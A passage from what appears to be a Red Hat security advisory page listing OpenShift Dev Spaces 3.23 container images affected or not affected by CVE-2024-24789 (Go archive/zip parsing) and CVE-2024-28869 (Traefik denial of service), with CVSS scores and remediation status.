Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le		—

Threats

Impact Moderate

CVE-2024-24789

A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE-20 - Improper Input Validation

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Vendor Fix fix

Known not affected 50 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le		—

Threats

Impact Moderate

CVE-2024-28869

An improper handling of exceptional conditions vulnerability was found in Traefik. In affected versions, sending a GET request to any Traefik endpoint with the "Content-length" request header results in an indefinite hang with the default configuration, resulting in a denial of service.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-755 - Improper Handling of Exceptional Conditions

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Vendor Fix fix

Known not affected 50 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64		—
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64		—
